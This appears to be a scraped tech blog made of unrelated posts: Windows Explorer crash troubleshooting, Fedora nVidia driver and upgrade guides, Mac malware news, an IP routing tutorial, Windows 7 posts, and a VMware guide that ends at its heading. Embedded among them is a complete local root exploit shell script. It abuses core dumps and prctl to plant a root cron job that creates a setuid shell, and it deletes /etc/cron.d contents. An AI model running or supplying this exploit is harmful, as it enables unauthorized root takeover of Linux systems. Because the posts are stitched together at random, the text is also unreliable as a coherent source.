Microsoft Error 1000 Win7 Explorer 6.1

 

If you experience a problem with Windows Explorer crashing (restarting) and "checking for a solution" frequently, please check your event log (Start Menu -> Control Panel -> All Control Panel Items -> Administrative Tools -> Event Viewer) and look at the Application log entries for details:

Error 1000

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0x1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:\Windows\explorer.exe
Faulting module path: C:\Program Files\DivX\DivX Plus Media Foundation Components\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary Solution – Uninstall DivX

As you can see, the problem can easily be rectified, but only if you know what you're doing. The conflicting DLL (or other file) could also be malware, or be linked to a bigger program.

P.S. This error had to be documented here, as the Microsoft site has changed to only accept bug reports for software under evaluation 🙂

Exploit Title: Linux 3.x.x Executable File Read Exploit

# Date: 6/26/12
# Version: 3.x.x
# Category: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + affected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others …
# ~
# Use this at your own risk, I’m not responsible for any risk.
# sorchfox@hotmail.com

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait approx 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

This guide shows how to install the proprietary nVidia drivers on Fedora 14 and disable the Nouveau driver.

 

I wrote this guide about two weeks ago, but I delayed its publication because of a pyxf86config bug, which caused the following livna-config-display errors on boot:


Checking for module nvidia.ko: [ OK ]
Enabling the nvidia driver: Traceback (most recent call last):
File "/usr/sbin/nvidia-config-display", line 28, in <module>
import livnaConfigDisplay.ConfigDisplay
File "/usr/lib/python2.7/site-packages/livnaConfigDisplay/ConfigDisplay.py", line 29, in <module>
import xf86config
File "/usr/lib/python2.7/site-packages/xf86config.py", line 1, in <module>
import ixf86config
ImportError: /usr/lib/python2.7/site-packages/ixf86configmodule.so: undefined symbol: xstrtokenize
[FAILED]

But now, based on my own testing and that of others, everything seems to work well with pyxf86config and livna-config-display, since the pyxf86config bug has been fixed.

This guide works with GeForce 6/7/8/9/200/300 series cards and also with GeForce FX cards.

Install nVidia proprietary drivers on Fedora 14 and disable the nouveau driver

1. Change to the root user

su -
## OR ##
sudo -i

2. Make sure that you are running the latest kernel

If not, update the kernel and reboot:

yum update kernel*
reboot

3. Add RPMFusion Repositories (Free and Non-Free)

rpm -Uvh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm
rpm -Uvh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm

4. Install nVidia proprietary drivers

4a. Install nVidia proprietary drivers for GeForce 6/7/8/9/200/300 series cards

Select kmod, kmod-PAE, or akmod from the following.

kmod-nvidia

yum install kmod-nvidia xorg-x11-drv-nvidia-libs

or

kmod-nvidia-PAE kernel

yum install kmod-nvidia-PAE

or

akmod-nvidia

yum install akmod-nvidia xorg-x11-drv-nvidia-libs

kmod works fine for most people, but it doesn't work on systems with a different kernel:

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

For a full breakdown of the differences between kmod and akmod, check this.

4b. Install nVidia proprietary drivers for GeForce FX cards

Select kmod, kmod-PAE, or akmod from the following.

kmod-nvidia-173xx

yum --enablerepo=rpmfusion-nonfree-updates-testing install kmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

or

kmod-nvidia-PAE kernel

yum --enablerepo=rpmfusion-nonfree-updates-testing  install kmod-nvidia-173xx-PAE

or

akmod-nvidia

yum --enablerepo=rpmfusion-nonfree-updates-testing install akmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

kmod works fine for most people, but it doesn't work on systems with a different kernel:

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

For a full breakdown of the differences between kmod and akmod, check this.

5. Check /etc/X11/xorg.conf file

This should not be necessary, but I recommend it because of the pyxf86config bug.

Open the /etc/X11/xorg.conf file and check the following rows:
32-bit

Section "Files"
    ModulePath   "/usr/lib/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib/xorg/modules"
EndSection

64-bit

Section "Files"
    ModulePath   "/usr/lib64/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib64/xorg/modules"
EndSection

If the "Files" section is missing, it has to be added manually.

6. Check /boot/grub/grub.conf file

This should not be necessary, but a missing rdblacklist=nouveau nouveau.modeset=0 is the most common cause of a black/blank screen on boot with the nVidia drivers, so it's good to check the following as well. 😉

Open the /boot/grub/grub.conf file and check that the kernel row carries rdblacklist=nouveau nouveau.modeset=0:

title Fedora (2.6.35.6-48.fc14.i686)
        root (hd0,0)
        kernel /vmlinuz-2.6.35.6-48.fc14.i686 .... rdblacklist=nouveau nouveau.modeset=0
        initrd /initramfs-2.6.35.6-48.fc14.i686.img
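If you'd rather check this from a script, a small helper like the following can do it. This is my own sketch, not part of the original guide; the /boot/grub/grub.conf path is the stock GRUB Legacy location on Fedora 14 and may differ elsewhere:

```shell
# check_nouveau_blacklist FILE
# Prints OK if every "kernel" line in FILE carries the nouveau
# blacklist options, otherwise prints a warning.
check_nouveau_blacklist() {
    if grep '^[[:space:]]*kernel' "$1" | grep -qv 'rdblacklist=nouveau nouveau.modeset=0'; then
        echo "WARNING: a kernel line is missing rdblacklist=nouveau nouveau.modeset=0"
    else
        echo "OK: nouveau is blacklisted"
    fi
}

# Only run against the real file when it exists.
[ -f /boot/grub/grub.conf ] && check_nouveau_blacklist /boot/grub/grub.conf
```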

7. Finally all is done and then reboot

reboot

Please let me know if you have any problems with the nVidia driver installation. You could also let me know whether you got the drivers installed using this guide, and what graphics card you have.


How to upgrade Fedora using PreUpgrade

Coming from a Debian background, upgrading to new releases is second nature. Unfortunately, Fedora doesn’t seem to have it quite as down pat. Nevertheless, it’s possible and works quite well (but there are pitfalls, so read on).

While upgrading via PackageKit is coming, there’s a pretty decent way of doing it with PreUpgrade.

First, update your current system:
yum update

Install preupgrade:
yum install preupgrade

Run the preupgrade tool, and follow the prompts (remote upgrades over VNC also supported):
preupgrade

PreUpgrade will prompt to reboot your computer and will update your system automatically. All of your packages should be updated and your repositories configured for you (I also had RPMFusion, Chromium and yum-rawhide which all updated as expected). On one of my systems, even the NVIDIA driver was automatically updated and configured. Now you’re booted into your new Fedora 14 system.

OK, this is where things get a little tricky. Some packages might be no longer supported, there might be removed dependencies, and the like. So, there are two neat commands that we will use to identify these packages so that you can remove them.

package-cleanup --orphans
package-cleanup --leaves

But wait… I discovered that there's a more important step to do first, or you'll cause yourself a headache!

On my machine, this wanted to remove some pretty important packages, like kdelibs.
[username@shem ~]$ sudo package-cleanup --orphans
[sudo] password for username:
Loaded plugins: refresh-packagekit, remove-with-leaves
akonadi-1.4.0-3.fc13.x86_64
kdeedu-marble-4.5.2-2.fc13.x86_64
kdeedu-marble-libs-4.5.2-2.fc13.x86_64
kdelibs-4.5.2-8.fc13.x86_64
kdelibs-common-4.5.2-8.fc13.x86_64
schroedinger-1.0.10-1.fc13.x86_64
xorg-x11-drv-wacom-0.10.8-2.fc13.x86_64

Fedora (unlike certain other distros I know) provides major updates to the latest versions of packages (like OpenOffice.org, KDE, GNOME, etc). Yay! It’s possible that your new Fedora system is running the same version of, say KDE, as your old one. This was indeed the case with my Fedora 13 to 14 upgrade (both run KDE 4.5.2 at time of F14 release).

Actually, the build of some important packages on Fedora 13 (like kdelibs-4.5.2-8.fc13.x86_64) were actually more recent than on the newer Fedora 14 system (kdelibs-4.5.2-5.fc14.x86_64).

The package-cleanup tool correctly lists kdelibs-4.5.2-8.fc13.x86_64 as being an orphan and if you were to remove this, you’d break your system badly. In fact, if you’re running yum’s brilliant new autoremove deps feature, as I am, you’ll lose most of your system. It makes sense – you are telling yum to remove kdelibs, so it goes and removes everything that relies on it! Yikes.

So first, we need to fix this by running the yum distro-sync command, which recognises that we need to downgrade those kdelibs packages (and not remove them!).

[chris@shem ~]$ sudo yum distro-sync
Loaded plugins: refresh-packagekit, remove-with-leaves
Setting up Distribution Synchronization Process
Resolving Dependencies
--> Running transaction check
---> Package akonadi.x86_64 0:1.4.0-1.fc14 will be a downgrade
---> Package akonadi.x86_64 0:1.4.0-3.fc13 will be erased
---> Package kdeedu-marble.x86_64 0:4.5.2-1.fc14 will be a downgrade
---> Package kdeedu-marble.x86_64 0:4.5.2-2.fc13 will be erased
---> Package kdeedu-marble-libs.x86_64 0:4.5.2-1.fc14 will be a downgrade
---> Package kdeedu-marble-libs.x86_64 0:4.5.2-2.fc13 will be erased
---> Package kdelibs.x86_64 6:4.5.2-5.fc14 will be a downgrade
---> Package kdelibs.x86_64 6:4.5.2-8.fc13 will be erased
---> Package kdelibs-common.x86_64 6:4.5.2-5.fc14 will be a downgrade
---> Package kdelibs-common.x86_64 6:4.5.2-8.fc13 will be erased
---> Package schroedinger.x86_64 0:1.0.9-2.fc14 will be a downgrade
---> Package schroedinger.x86_64 0:1.0.10-1.fc13 will be erased
---> Package xorg-x11-drv-wacom.x86_64 0:0.10.8-1.20100726.fc14 will be a downgrade
---> Package xorg-x11-drv-wacom.x86_64 0:0.10.8-2.fc13 will be erased
--> Finished Dependency Resolution
--> Finding unneeded leftover dependencies
Found and removing 0 unneeded dependencies
----
Dependencies Resolved
=================================================
Package Arch Version Repository Size
=================================================
Downgrading:
akonadi x86_64 1.4.0-1.fc14 fedora 677 k
kdeedu-marble x86_64 4.5.2-1.fc14 fedora 14 M
kdeedu-marble-libs x86_64 4.5.2-1.fc14 fedora 902 k
kdelibs x86_64 6:4.5.2-5.fc14 fedora 12 M
kdelibs-common x86_64 6:4.5.2-5.fc14 fedora 1.7 M
schroedinger x86_64 1.0.9-2.fc14 fedora 276 k
xorg-x11-drv-wacom x86_64 0.10.8-1.20100726.fc14 fedora 73 k
---
Transaction Summary
=================================================
Downgrade 7 Package(s)
---
Total download size: 30 M
Is this ok [y/N]

Once we downgrade these packages, we can then remove any other orphans we might have, with package-cleanup --leaves and package-cleanup --orphans (I didn't have any). One last thing to note: Fedora will not replace packages from the newer release if they are exactly the same version. For this reason, you will probably have some F13 packages still installed on your computer – don't worry, that's correct. They will be upgraded in time (if required).

So, now I think I know how to successfully upgrade the system without breaking it :-) If anyone has some other tips or corrections, please let me know! Hope that’s helpful.

Mac OS-X Malware

For many, many years people thought that if you had an Apple Mac computer then you were invulnerable to viruses, malware, spyware, and other types of threats!

Well, they have always been wrong. For many years Apple has wanted to compete against other giants like Linux or Windows, and when they brought out the iPad and iPhone, the surge in popularity increased their exposure to attack. I hope they understand this and build in extra security to immunise their systems, even though we all know how bad, to put it politely, their products can be. So if you want to find out more: protect yourself by using XProtect.

Malware for Mac OS does exist and it's becoming more and more widespread. In particular OSX/Pinhead-B, as categorized by Sophos, and better known as HellRTS, is malware that gives complete remote control of the infected OS-X machine: an attacker can take snapshots, send emails, transfer files and log keystrokes from the victim. Apple, however, seems to be pleased by this misbelief and does little to wake its users up to the malware threat: an update to Snow Leopard included a silent update to XProtect.plist. XProtect is, in the words of Graham Cluley, Senior Security Consultant at Sophos, a rudimentary file that contains elementary signatures of a handful of Mac threats. Starting from version 10.6, OS-X users are warned when suspicious files are downloaded and executed from Entourage, Safari, Mail, Thunderbird and other browsing tools. This kind of protection is rather sloppy, as malware can get through by means of Skype, BitTorrent or other tools that are currently unsupported by Mac OS-X's built-in signature-based malware protection.

More info is available here.

The update schedule for Snow Leopard has been:

  • 10.6           –       August 28, 2009 (release date)
  • 10.6.1        –       September 10, 2009
  • 10.6.2        –       November 9, 2009
  • 10.6.3        –       March 29, 2010 (revised April 13, 2010)
  • 10.6.4        –       June 15, 2010

This last update included an update to XProtect to protect against OSX.HellRTS (aka OSX/Pinhead-B). This has doubled the size of the file.

Most Mac malware solutions protected against OSX/Pinhead-B by the end of April. Waiting for an OS update to protect against malware could prove costly if this backdoor steals your personal information, not least because XProtect only scans downloaded (not installed) files. So there you have it: the proof is in the pudding!

IP Routing Explained

IP Routing

We now take up the question of finding the host that datagrams go to based on the IP address. Different parts of the address are handled in different ways; it is your job to set up the files that indicate how to treat each part.

IP Networks

When you write a letter to someone, you usually put a complete address on the envelope specifying the country, state, and Zip Code. After you put it in the mailbox, the post office will deliver it to its destination: it will be sent to the country indicated, where the national service will dispatch it to the proper state and region. The advantage of this hierarchical scheme is obvious: wherever you post the letter, the local postmaster knows roughly which direction to forward the letter, but the postmaster doesn’t care which way the letter will travel once it reaches its country of destination.

IP networks are structured similarly. The whole Internet consists of a number of proper networks, called autonomous systems. Each system performs routing between its member hosts internally so that the task of delivering a datagram is reduced to finding a path to the destination host’s network. As soon as the datagram is handed to any host on that particular network, further processing is done exclusively by the network itself.

Subnetworks

This structure is reflected by splitting IP addresses into a host and network part, as explained previously. By default, the destination network is derived from the network part of the IP address. Thus, hosts with identical IP network numbers should be found within the same network.[1]

It makes sense to offer a similar scheme inside the network, too, since it may consist of a collection of hundreds of smaller networks, with the smallest units being physical networks like Ethernets. Therefore, IP allows you to subdivide an IP network into several subnets.

A subnet takes responsibility for delivering datagrams to a certain range of IP addresses. It is an extension of the concept of splitting bit fields, as in the A, B, and C classes. However, the network part is now extended to include some bits from the host part. The number of bits that are interpreted as the subnet number is given by the so-called subnet mask, or netmask. This is a 32-bit number too, which specifies the bit mask for the network part of the IP address.

The campus network of Groucho Marx University is an example of such a network. It has a class B network number of 149.76.0.0, and its netmask is therefore 255.255.0.0.

Internally, GMU's campus network consists of several smaller networks, such as the various departments' LANs. So the range of IP addresses is broken up into 254 subnets, 149.76.1.0 through 149.76.254.0. For example, the department of Theoretical Physics has been assigned 149.76.12.0. The campus backbone is a network in its own right, and is given 149.76.1.0. These subnets share the same IP network number, while the third octet is used to distinguish between them. They will thus use a subnet mask of 255.255.255.0.

Figure 2-1 shows how 149.76.12.4, the address of quark, is interpreted differently when the address is taken as an ordinary class B network and when used with subnetting.

Figure 2-1. Subnetting a class B network

It is worth noting that subnetting (the technique of generating subnets) is only an internal division of the network. Subnets are generated by the network owner (or the administrators). Frequently, subnets are created to reflect existing boundaries, be they physical (between two Ethernets), administrative (between two departments), or geographical (between two locations), and authority over each subnet is delegated to some contact person. However, this structure affects only the network’s internal behaviour, and is completely invisible to the outside world.

Gateways

Subnetting is not only a benefit to the organization; it is frequently a natural consequence of hardware boundaries. The viewpoint of a host on a given physical network, such as an Ethernet, is a very limited one: it can only talk to the host of the network it is on. All other hosts can be accessed only through special-purpose machines called gateways. A gateway is a host that is connected to two or more physical networks simultaneously and is configured to switch packets between them.

Figure 2-2 shows part of the network topology at Groucho Marx University (GMU). Hosts that are on two subnets at the same time are shown with both addresses.

Figure 2-2. A part of the net topology at Groucho Marx University

Different physical networks have to belong to different IP networks for IP to be able to recognize if a host is on a local network. For example, the network number 149.76.4.0 is reserved for hosts on the mathematics LAN. When sending a datagram to quark, the network software on erdos immediately sees from the IP address 149.76.12.4 that the destination host is on a different physical network, and therefore can be reached only through a gateway (sophus by default).

sophus itself is connected to two distinct subnets: the Mathematics department and the campus backbone. It accesses each through a different interface, eth0 and fddi0, respectively. Now, what IP address do we assign it? Should we give it one on subnet 149.76.1.0, or on 149.76.4.0?

The answer is: “both.” sophus has been assigned the address 149.76.1.1 for use on the 149.76.1.0 network and address 149.76.4.1 for use on the 149.76.4.0 network. A gateway must be assigned one IP address for each network it belongs to. These addresses—along with the corresponding netmask—are tied to the interface through which the subnet is accessed. Thus, the interface and address mapping for sophus would look like this:

Interface   Address      Netmask
eth0        149.76.4.1   255.255.255.0
fddi0       149.76.1.1   255.255.255.0
lo          127.0.0.1    255.0.0.0

The last entry describes the loopback interface lo, which we talked about earlier.
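With the classic net-tools commands of that era, the mapping above would be brought up along these lines (an illustrative sketch, run as root; the loopback interface is normally configured automatically by the init scripts):

```shell
# Assign one address per attached network, tying the netmask
# to the interface through which that subnet is reached.
ifconfig eth0 149.76.4.1 netmask 255.255.255.0 up
ifconfig fddi0 149.76.1.1 netmask 255.255.255.0 up

# Loopback interface with the standard class A loopback netmask.
ifconfig lo 127.0.0.1 netmask 255.0.0.0 up
```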

Generally, you can ignore the subtle difference between attaching an address to a host or its interface. For hosts that are on one network only, like erdos, you would generally refer to the host as having this-and-that IP address, although strictly speaking, it’s the Ethernet interface that has this IP address. The distinction is really important only when you refer to a gateway.

The Routing Table

We now focus our attention on how IP chooses a gateway to use to deliver a datagram to a remote network.

We have seen that erdos, when given a datagram for quark, checks the destination address and finds that it is not on the local network. erdos therefore sends the datagram to the default gateway sophus, which is now faced with the same task. sophus recognizes that quark is not on any of the networks it is connected to directly, so it has to find yet another gateway to forward it through. The correct choice would be niels, the gateway to the Physics department. sophus thus needs information to associate a destination network with a suitable gateway.

IP uses a table for this task that associates networks with the gateways by which they may be reached. A catch-all entry (the default route) must generally be supplied too; this is the gateway associated with network 0.0.0.0. All destination addresses match this route, since none of the 32 bits are required to match, and therefore packets to an unknown network are sent through the default route. On sophus, the table might look like this:

Network      Netmask          Gateway      Interface
149.76.1.0   255.255.255.0    -            fddi0
149.76.2.0   255.255.255.0    149.76.1.2   fddi0
149.76.3.0   255.255.255.0    149.76.1.3   fddi0
149.76.4.0   255.255.255.0    -            eth0
149.76.5.0   255.255.255.0    149.76.1.5   fddi0
...          ...              ...          ...
0.0.0.0      0.0.0.0          149.76.1.2   fddi0

If you need to use a route to a network that sophus is directly connected to, you don’t need a gateway; the gateway column here contains a hyphen.

The process for identifying whether a particular destination address matches a route is a mathematical operation. The process is quite simple, but it requires an understanding of binary arithmetic and logic: A route matches a destination if the network address logically ANDed with the netmask precisely equals the destination address logically ANDed with the netmask.

Translation: a route matches if the number of bits of the network address specified by the netmask (starting from the left-most bit, the high order bit of byte one of the address) match that same number of bits in the destination address.

When the IP implementation is searching for the best route to a destination, it may find a number of routing entries that match the target address. For example, we know that the default route matches every destination, but datagrams destined for locally attached networks will match their local route, too. How does IP know which route to use? It is here that the netmask plays an important role. While both routes match the destination, one of the routes has a larger netmask than the other. We previously mentioned that the netmask was used to break up our address space into smaller networks. The larger a netmask is, the more specifically a target address is matched; when routing datagrams, we should always choose the route that has the largest netmask. The default route has a netmask of zero bits, and in the configuration presented above, the locally attached networks have a 24-bit netmask. If a datagram matches a locally attached network, it will be routed to the appropriate device in preference to following the default route because the local network route matches with a greater number of bits. The only datagrams that will be routed via the default route are those that don't match any other route.
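The bitwise comparison described above can be sketched in a few lines of shell, using the GMU addresses from the text. This is a toy illustration of the arithmetic only; real IP stacks do this inside the kernel:

```shell
# Convert dotted-quad notation to a 32-bit integer.
ip2int() {
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# A route matches when (destination AND netmask) == (network AND netmask).
route_matches() { # usage: route_matches DEST NETWORK NETMASK
    dest=$(ip2int "$1"); net=$(ip2int "$2"); mask=$(ip2int "$3")
    if [ $(( dest & mask )) -eq $(( net & mask )) ]; then
        echo "match"
    else
        echo "no match"
    fi
}

route_matches 149.76.12.4 149.76.12.0 255.255.255.0   # prints "match"
route_matches 149.76.12.4 149.76.4.0 255.255.255.0    # prints "no match"
route_matches 149.76.12.4 0.0.0.0 0.0.0.0             # prints "match": the default route
```

Note how the default route (netmask 0.0.0.0) matches everything, which is exactly why the longest-netmask rule is needed to prefer the local route.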

You can build routing tables by a variety of means. For small LANs, it is usually most efficient to construct them by hand and feed them to IP using the route command at boot time. For larger networks, they are built and adjusted at runtime by routing daemons; these daemons run on central hosts of the network and exchange routing information to compute “optimal” routes between the member networks.
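For a small LAN, the sophus table above could be entered by hand with the classic route command, along these lines (an illustrative sketch of the net-tools syntax of the period; must be run as root, typically from a boot script):

```shell
# Directly attached networks: no gateway needed, just the interface.
route add -net 149.76.1.0 netmask 255.255.255.0 dev fddi0
route add -net 149.76.4.0 netmask 255.255.255.0 dev eth0

# Remote subnets reached through gateways on the backbone.
route add -net 149.76.2.0 netmask 255.255.255.0 gw 149.76.1.2
route add -net 149.76.3.0 netmask 255.255.255.0 gw 149.76.1.3
route add -net 149.76.5.0 netmask 255.255.255.0 gw 149.76.1.5

# Catch-all default route (network 0.0.0.0).
route add default gw 149.76.1.2
```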

Depending on the size of the network, you'll need to use different routing protocols. For routing inside autonomous systems (such as the Groucho Marx campus), the internal routing protocols are used. The most prominent one of these is the Routing Information Protocol (RIP), which is implemented by the BSD routed daemon. For routing between autonomous systems, external routing protocols like the Exterior Gateway Protocol (EGP) or the Border Gateway Protocol (BGP) have to be used; these protocols, including RIP, have been implemented in Cornell University's gated daemon.

Metric Values

We depend on dynamic routing to choose the best route to a destination host or network based on the number of hops. Hops are the gateways a datagram has to pass before reaching a host or network. The shorter a route is, the better RIP rates it. Very long routes with 16 or more hops are regarded as unusable and are discarded.

RIP manages routing information internal to your local network, but you have to run gated on all hosts. At boot time, gated checks for all active network interfaces. If there is more than one active interface (not counting the loopback interface), it assumes the host is switching packets between several networks and will actively exchange and broadcast routing information. Otherwise, it will only passively receive RIP updates and update the local routing table.

When broadcasting information from the local routing table, gated computes the length of the route from the so-called metric value associated with the routing table entry. This metric value is set by the system administrator when configuring the route, and should reflect the actual route cost.[2] Therefore, the metric of a route to a subnet that the host is directly connected to should always be zero, while a route going through two gateways should have a metric of two. You don’t have to bother with metrics if you don’t use RIP or gated.
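In route terms, the metric is attached when the entry is created. A sketch (the remote network and gateway addresses here are placeholders of my own, not taken from the text):

```shell
# Directly connected subnet: metric 0, per the rule above.
route add -net 149.76.4.0 netmask 255.255.255.0 dev eth0 metric 0

# A subnet reached through two gateways: metric 2, so RIP rates
# the path correctly. (149.76.23.0 is an illustrative placeholder.)
route add -net 149.76.23.0 netmask 255.255.255.0 gw 149.76.1.2 metric 2
```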

Notes

[1]

Autonomous systems are slightly more general. They may comprise more than one IP network.

[2]

The cost of a route can be thought of, in a simple case, as the number of hops required to reach the destination. Proper calculation of route costs can be a fine art in complex network designs.

Windows 7 installation

Hi, a lot of people seem to be having problems installing Windows 7. There are many ways to complete the installation:

fresh install

Network

3rd party (USB, ext. HDD), etc.

Local pre-install

and

Upgrade

The latter is what I would suggest to the public and most end users. Yes, upgrading was the least favourable option with previous Microsoft operating systems, but here it has proven to be the most stable. You get the updates to the install files and keep your existing drivers, which you can update later (for example, your graphics driver). Many users and professionals are reporting driver problems with the RC when using the fresh install and network install options, because the DVD image (which you should burn with ISO Burn, Nero, or something similar) has to provide the generic drivers for your system; if there is an issue with the DVD, setup will not complete. Also, the downloaded image supplied by Microsoft will not always automatically create the partitions needed for the install, so you could get an error code like "0x80070570", indicating that you do not have enough space for Windows 7. So, if you are not sure, or want some reliability in your new installation, use the upgrade option in the Windows 7 installer and have fun.

http://www.microsoft.com/windows/windows-7/download.aspx

http://www.microsoft.com/windows/windows-vista/get/upgrade-advisor.aspx

Windows 7 vs Vista vs XP

Hey there fellas, I have some results on Windows 7! Thanks to people like Nicholas Wilkinson and others for dropping me a message; I’ve put some information together for you, and I hope you enjoy it.

How does Windows 7 beta 1 compare to Vista and XP in terms of performance? That’s a question that’s been hitting my inbox regularly over the past few weeks. Let’s see if we can’t answer it!

Important note: Before I go any further I feel I need to make a point, and make it clear. The build I’m testing of Windows 7 (build 6.1.7000.0.081212-1400) is a beta build, and as a rule beta builds are usually more geared towards stability than performance. That said, the performance of this build should give us a clue as to how the OS is coming along.

Rather than publish a series of benchmark results for the three operating systems (something which Microsoft frowns upon for beta builds, not to mention the fact that the final numbers only really matter for the release candidate and RTM builds), I’ve decided to put Windows 7, Vista and XP head-to-head in a series of real-world tests to find out which OS comes out top.

The tests

There are 23 tests in all, most of which are self-explanatory:

  1. Install OS – Time it takes to install the OS
  2. Boot up – Average boot time to usable desktop
  3. Shut down – Average shut down time
  4. Move 100MB files – Move 100MB of JPEG files from one hard drive to another
  5. Move 2.5GB files – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from one hard drive to another
  6. Network transfer 100MB files – Move 100MB of JPEG files from test machine to NAS device
  7. Network transfer 2.5GB files – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from test machine to NAS device
  8. Move 100MB files under load – Move 100MB of JPEG files from one hard drive to another while ripping DVD to .ISO file
  9. Move 2.5GB files under load – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from one hard drive to another while ripping DVD to .ISO file
  10. Network transfer 100MB files under load – Move 100MB of JPEG files from test machine to NAS device while ripping DVD to .ISO file
  11. Network transfer 2.5GB files under load – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from test machine to NAS device while ripping DVD to .ISO file
  12. Compress 100MB files – Using built-in ZIP compression
  13. Compress 1GB files – Using built-in ZIP compression
  14. Extract 100MB files – Using built-in ZIP compression
  15. Extract 1GB files – Using built-in ZIP compression
  16. Install Office 2007 – Ultimate version, from DVD
  17. Open 10 page Word doc – Text only
  18. Open 100 page Word doc – Text and images only
  19. Open simple Excel doc – Basic formatting
  20. Open complex Excel doc – Including formula and charts
  21. Burn DVD – Win 7 beta 1 .ISO to disc using CDBurnerXP
  22. Open 10 page PDF – Text only, using latest Adobe Reader 8
  23. Open 100 page PDF – Text and images, using latest Adobe Reader 8

This series of tests pitches Windows 7 build 7000 (32-bit) against Windows Vista SP1 (32-bit) and Windows XP SP3 (32-bit). The scoring for each test is simple: the winning OS scores 1, the runner-up 2, and the loser 3. The scores are added up, and the OS with the lowest total at the end wins.
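
The scoring scheme is easy to sanity-check. Here is a quick sketch in shell; the placements below are invented for illustration and are not the article's results:

```shell
# Each OS gets a placement per test: 1 = winner, 2 = runner-up, 3 = loser.
# Lowest total wins. Placements here are made up, not measured.
total() { echo "$1" | tr ' ' '\n' | awk '{s += $1} END {print s}'; }

win7="1 1 2"
vista="2 3 3"
xp="3 2 1"

echo "Win7:  $(total "$win7")"    # 4
echo "Vista: $(total "$vista")"   # 8
echo "XP:    $(total "$xp")"      # 6
```

With 23 tests the totals range from 23 (won everything) to 69 (lost everything).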

The test systems

I’ve used two desktop systems as the test machines:

  • An AMD Phenom 9700 2.4GHz system fitted with an ATI Radeon 3850 and 4GB of RAM
  • An Intel Pentium Dual Core E2200 2.2GHz fitted with an NVIDIA GeForce 8400 GS and 1GB of RAM

The results

Here are the results of the tests for the two systems:

Conclusion

The bottom line is that the more I use Windows 7 the more I like it. Sure, we’re looking at a beta build here and not the final code, so things could change between now and release (although realistically final code ends up being faster than beta code). Also I still have some nagging issues relating to the interface, and some concerns that the UAC changes will break applications and other code, especially installers, but overall Windows 7 beta 1 is a robust, solid bit of code.

Sure, Windows 7 is not XP, and never will be (thankfully). And if you’re put off by things such as activation and DRM, then Windows isn’t the OS for you (good news is there are others to choose from). But if you’re looking for a solid OS then Windows 7 seems ready to deliver just that – a fast, reliable, relatively easy to use platform for your hardware and software.

Final curtain for UIQ Symbian interface

According to a report by Swedish online magazine mobil.se, the Swedish software company UIQ has given notice to all of its 270 employees. UIQ produces one of the two interfaces for the Symbian OS smartphone operating system. Smartphones with this interface were produced by UIQ’s owners Motorola and Sony Ericsson, among others, but both vendors recently decided to abandon the platform.

Sony Ericsson had already announced the end of UIQ at the Symbian Smartphone Show last October. The Japanese-Swedish vendor still plans to provide financial support for UIQ for some time to give the company a chance for negotiating a partial or complete takeover by an investor. Individual employees are also to receive support, for example if they decide to start their own business. Motorola is restructuring its mobile phone sector and plans to exclusively use its own P2k platform as well as Android and Microsoft Windows Mobile in the future.

The Symbian Foundation was initially formed to create a uniform platform with a common user interface framework from the competing UIQ and S60 interfaces. In the meantime, however, Nokia has presented an improved S60 interface that is optimised for touch screen operation.

VMware Tools on Ubuntu

HowTo: VMware Tools on Ubuntu 8.10 Server


I managed to install VMware Tools on Ubuntu 8.10 Server build 110271. It was complicated, so I thought I’d share, because you just can’t find a good guide for 8.10 at the moment. When you define your VM, set the network adapter to E1000 at first.
INSTALLING THE OS
Start the virtual machine; in the console, select the language and press F4 to change the mode to “Install a minimal virtual machine”. Press Enter to start the installation.
Select the following items from the desired services (this is for what I intend to do with my server, you might need different options):

  • Basic Ubuntu server
  • OpenSSH server
  • Samba file server
  • Virtual Machine host
  • LAMP server

Don’t forget to set up RAID if you need it and attach all your drives.
Log into the machine with your details and update it:

Code:

sudo apt-get update
sudo apt-get upgrade

I also added Fluxbox and Webmin for extra ease of use; you may want to check these out!

INSTALL THE VMWARE TOOLS

